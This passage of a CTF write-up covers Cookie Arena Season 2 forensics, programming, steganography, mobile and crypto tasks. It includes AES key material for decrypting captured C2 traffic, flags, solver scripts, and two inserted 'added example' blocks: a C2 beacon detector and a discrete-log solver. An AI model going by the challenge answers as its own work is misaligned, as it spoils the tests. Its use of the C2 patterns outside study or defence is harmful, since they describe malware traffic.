Filter on `http.request.method == "POST"` in Wireshark.

![](https://hackmd.io/_uploads/rkrqWHYF3.png)

Use tshark to extract the data in `urlencoded-form.value`, which gives:

```
aix8RxrqFg9Wi2uiE6B8BVgr5L51x55Cxxxw4zppPONqXskKoe+N7OMDg1d06pTj
luFqXmiFN1kyXfGkxrD9GukoecDD5s6XLJwlHJ2T/Yu7F8NkHwvBwut0us0/rbsJabWaVH47WHTwPEdGnj2rxdsm0o7dns4ptkRQ4ckX9uxwMLKqFWygzb9oSVA7BR7ilsjkBwvvSJDmKCOcITICTg==
```

From the `deCRyPT` function we know that the first 16 bytes are the IV and the rest is the encrypted plaintext.
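The deobfuscated script registers at `/reg`, polls `/tasks/<id>` and posts to `/results/<id>`, so the same traffic can be found from HTTP request metadata alone. The following is an added example, not part of the original write-up; the record layout, the function name and the sample records are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from statistics import median

TASK = re.compile(r"^/tasks/([^/?]+)$")
RESULT = re.compile(r"^/results/([^/?]+)$")

# Constructed records (epoch seconds, client, server, method, path); not from the pcap.
SAMPLE = [
    (100.0, "10.0.0.5", "203.0.113.9:7331", "POST", "/reg"),
    (101.0, "10.0.0.5", "203.0.113.9:7331", "GET", "/tasks/ab12"),
    (104.0, "10.0.0.5", "203.0.113.9:7331", "GET", "/tasks/ab12"),
    (104.6, "10.0.0.5", "203.0.113.9:7331", "POST", "/results/ab12"),
    (107.0, "10.0.0.5", "203.0.113.9:7331", "GET", "/tasks/ab12"),
    (110.0, "10.0.0.5", "203.0.113.9:7331", "GET", "/tasks/ab12"),
    (102.0, "10.0.0.8", "198.51.100.20:80", "GET", "/index.html"),
    (103.0, "10.0.0.8", "198.51.100.20:80", "POST", "/login"),
    (105.0, "10.0.0.8", "198.51.100.20:80", "GET", "/tasks/today"),
]

def find_beacons(records, min_polls=3):
    """Flag (client, server) pairs that register, poll /tasks/<id> and post /results/<id>."""
    flows = defaultdict(lambda: {"reg": False, "polls": [], "ids": set(), "results": 0})
    for ts, client, server, method, path in sorted(records):
        flow = flows[(client, server)]
        task, result = TASK.match(path), RESULT.match(path)
        if method == "POST" and path == "/reg":
            flow["reg"] = True
        elif method == "GET" and task:
            flow["polls"].append(ts)
            flow["ids"].add(task.group(1))
        elif method == "POST" and result and result.group(1) in flow["ids"]:
            flow["results"] += 1
    hits = {}
    for pair, flow in flows.items():
        if flow["reg"] and len(flow["polls"]) >= min_polls and flow["results"]:
            # Time between consecutive polls; the script sleeps ${n} seconds per loop.
            gaps = [b - a for a, b in zip(flow["polls"], flow["polls"][1:])]
            hits[pair] = {"ids": sorted(flow["ids"]), "polls": len(flow["polls"]),
                          "results": flow["results"], "interval": median(gaps)}
    return hits

if __name__ == "__main__":
    for pair, info in find_beacons(SAMPLE).items():
        print(pair, info)
```

A flow can carry more than one identifier, because the script's `rename` task switches it to new `/tasks/` and `/results/` URLs.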
![](https://hackmd.io/_uploads/HJnfGrtFh.png)

Next, use [CyberChef](https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'77fdcac2333b9b670602d2c8ebb2a5843b9723f5d12924e43a59895c4e3647e3'%7D,%7B'option':'Hex','string':'6a2c7c471aea160f568b6ba2'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)) to decrypt.

![](https://hackmd.io/_uploads/Hk04SHtF2.png)

This yields a hex string; decoding it gives an image file.

![](https://hackmd.io/_uploads/SJKcHBYYh.png)

The downloaded image is a QR code; scanning it gives the flag.

Flag: CHH{D0n't_w0rRy_n0_st@r_wh3rE}

# Program

## Identity Security

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/identity-security

```python
def mask_phone_number(phone_number):
    # Keep the first 2 and last 3 characters, mask the rest
    return phone_number[:2] + '*'*(len(phone_number)-5) + phone_number[-3:]

def mask_email(email):
    username, domain = email.split('@')
    if len(username) <= 7:
        # Short username: keep only the first and last character
        masked_username = username[0] + '*'*(len(username)-2) + username[-1:]
    else:
        # Long username: keep the first 2 and last 3 characters
        masked_username = username[:2] + '*'*(len(username)-5) + username[-3:]
    masked_email = masked_username + '@' + domain
    return masked_email

n = int(input())
masked_info = []
for i in range(n):
    info = input().replace('\r','')
    if '@' in info:
        masked_info.append(mask_email(info))
    else:
        masked_info.append(mask_phone_number(info))
for info in masked_info:
    print(info)
```

## Decrypt

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/decrypt

```python
def reverse_string(string, start, end):
    # Reverse the slice string[start..end] (inclusive) in place
    new_string = string[:start] + string[start:end+1][::-1] + string[end+1:]
    return new_string

def find_divisors(n):
    divisors = []
    for i in range(1, n + 1):
        if n % i == 0:
            divisors.append(i)
    return divisors

n = int(input())
password = input()
divisors = find_divisors(n)
# For each divisor d of n, in increasing order, reverse the first d characters
for d in divisors:
    password = reverse_string(password, 0, d - 1)
print(password)
```

# Steganography

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/cutiek1tty

Using https://www.aperisolve.com/ reveals the password and shows that this is a RAR file.

![](https://hackmd.io/_uploads/S1-onlYY2.png)

![](https://hackmd.io/_uploads/B1H2nlKt3.png)

After extracting, we get:

![](https://hackmd.io/_uploads/H1U6nlFY3.png)

The magic bytes of `y0u_4r3_cl0s3.rar` are wrong.

![](https://hackmd.io/_uploads/SJjJTltFh.png)

Fix them to the correct RAR format and extract with the password found above.

![](https://hackmd.io/_uploads/SkS_6xKK2.png)

![](https://hackmd.io/_uploads/B1KFaltYh.png)

# Mobile

## CatMe

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/cat-me

![](https://hackmd.io/_uploads/ry399etth.png)

![](https://hackmd.io/_uploads/ByJgjxtY3.png)

## PinnedCookie

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/pinned-cookie

From here we get the base64 string and the key.

![](https://hackmd.io/_uploads/rk1Nigtt2.png)

Write a script based on `y0`.

![](https://hackmd.io/_uploads/SyWHieFKh.png)

Script:

```java
import java.util.Base64;

public class Main {
    public static void main(String[] args) {
        getFlag("MBw6FDdZBT4wRzkQMB0jYEc8EUUDLQwjPiE8LR0TDw==", "sTroN6PaSswORD");
    }

    public static void getFlag(String base64, String key) {
        byte[] decode = Base64.getDecoder().decode(base64);
        byte[] bArr = new byte[decode.length];
        byte[] bytes = key.getBytes();
        int length = decode.length;
        // XOR every decoded byte with the repeating key
        for (int i7 = 0; i7 < length; i7++) {
            bArr[i7] = (byte) (decode[i7] ^ bytes[i7 % bytes.length]);
        }
        // Print the resulting bytes as decimal values
        for (int i = 0; i < bArr.length; i++) {
            System.out.print(bArr[i] + " ");
        }
    }
}
```

# Crypto

## Basic Operator

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/basic-operator

Brute-force script for blocks 1 through 10 (block 0 can be guessed to be `CHH{`):

```python
from string import printable

def padding_pkcs7(data,block_size=4):
    tmp = len(data) + (block_size - len(data) % block_size)
    return data.ljust(tmp,bytes([block_size-(len(data)%block_size)]))

def split_block(data,block_size):
    return list(int.from_bytes(data[i:i+block_size],'little') for i in range(0,len(data),block_size))

def plus_func(data,shift):
    return (data+shift)&0xffffffff

def mul_func(data,mul):
    return (data*mul)&0xffffffff

def xor_shift_right_func(data,bit_loc):
    return (data^(data>>bit_loc))&0xffffffff

def pow_func(data,e,p):
    return pow(data,e,p)

def exp_func(data,base,p):
    return pow(base,data,p)

def ecb_mode(data):
    # Each 4-byte block is transformed independently
    return list(pow_func(exp_func(xor_shift_right_func(mul_func(plus_func(block,3442055609),2898124289),1),e,p),e,p) for block in split_block(padding_pkcs7(data,4),4))

def brute_force(index):
    # Try every 4-character printable string until it encrypts to cipher[index]
    for a in range(len(printable)):
        for b in range(len(printable)):
            for c in range(len(printable)):
                for d in range(len(printable)):
                    tmp = (printable[a]+printable[b]+printable[c]+printable[d]).encode()
                    enc = ecb_mode(tmp)[0]
                    if enc == cipher[index]:
                        return tmp

cipher = [752589857254588976778, 854606763225554935934, 102518422244000685572, 779286449062901931327, 424602910997772742508, 1194307203769437983433, 501056821915021871618, 691835640758326884371, 778501969928317687301, 1260460302610253211574, 833211399330573153864, 223847974292916916557]
p = 1341161101353773850779
e = 2
flag = b'CHH{'
for index in range(1, 11):
    flag += brute_force(index)
print(flag)
```

The last block has 3 possible cases:

- 1 flag character, equivalent to `}\x03\x03\x03`
- 2 flag characters, equivalent to `X}\x02\x02`
- 3 flag characters, equivalent to `XX}\x01`

Trying all three, I found that case 3 is the correct one. Script to brute-force the last block:

```python
for i in range(len(printable)):
    for j in range(len(printable)):
        tmp = (printable[i]+ printable[j]+ '}').encode() + b'\x01'
        enc = ecb_mode(tmp)[0]
        if enc == cipher[11]:
            print(flag+tmp)
            exit(0)
```

Flag: CHH{w3lc0m3_70_7h3_m47h_w0rld(1_h4t3_1t_th3r3)}
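Every step of the Basic Operator block transform above can be inverted, so each block can be recovered directly instead of by trying up to 100^4 candidates. The following is an added example, not the write-up's script, and it goes beyond the brute force shown: it solves the discrete logarithm for the 32-bit exponent with baby-step giant-step, then undoes the xor-shift, multiplication and addition. The function names are assumptions, and it assumes the exponent below 2**32 is unique for each ciphertext block.

```python
# Added example (not the write-up's script): invert each block instead of guessing it.
P, E = 1341161101353773850779, 2        # p and e from the write-up's script
ADD, MUL, MASK = 3442055609, 2898124289, 0xFFFFFFFF
CIPHER = [752589857254588976778, 854606763225554935934, 102518422244000685572,
          779286449062901931327, 424602910997772742508, 1194307203769437983433,
          501056821915021871618, 691835640758326884371, 778501969928317687301,
          1260460302610253211574, 833211399330573153864, 223847974292916916557]

G = pow(E, E, P)        # pow(pow(E, x, P), E, P) == pow(G, x, P)
M = 1 << 16             # square root of the 2**32 exponent space
STEP = pow(G, -M, P)    # G**(-M) mod P (Python 3.8+)
BABY = {}               # baby steps: G**j -> j for 0 <= j < M
_cur = 1
for _j in range(M):
    BABY.setdefault(_cur, _j)
    _cur = _cur * G % P

def encrypt_block(block):
    """Forward transform of one 4-byte block, same steps as ecb_mode above."""
    x = (int.from_bytes(block, "little") + ADD) & MASK
    x = (x * MUL) & MASK
    x ^= x >> 1
    return pow(pow(E, x, P), E, P)

def dlog32(target):
    """Baby-step giant-step: the x < 2**32 with G**x == target (mod P)."""
    gamma = target % P
    for i in range(M):
        if gamma in BABY:
            return i * M + BABY[gamma]
        gamma = gamma * STEP % P
    raise ValueError("no 32-bit exponent produces this ciphertext block")

def decrypt_block(c):
    x = dlog32(c)
    shift = 1
    while shift < 32:               # undo x ^= x >> 1 (Gray-code decode)
        x ^= x >> shift
        shift <<= 1
    x = x * pow(MUL, -1, 1 << 32) & MASK   # MUL is odd, so invertible mod 2**32
    return ((x - ADD) & MASK).to_bytes(4, "little")

def recover_flag(cipher=CIPHER):
    data = b"".join(decrypt_block(c) for c in cipher)
    return data[:-data[-1]]         # strip the PKCS#7-style padding

if __name__ == "__main__":
    print(recover_flag())
```

Each block costs at most 65536 table lookups, so all 12 blocks decrypt in well under a minute.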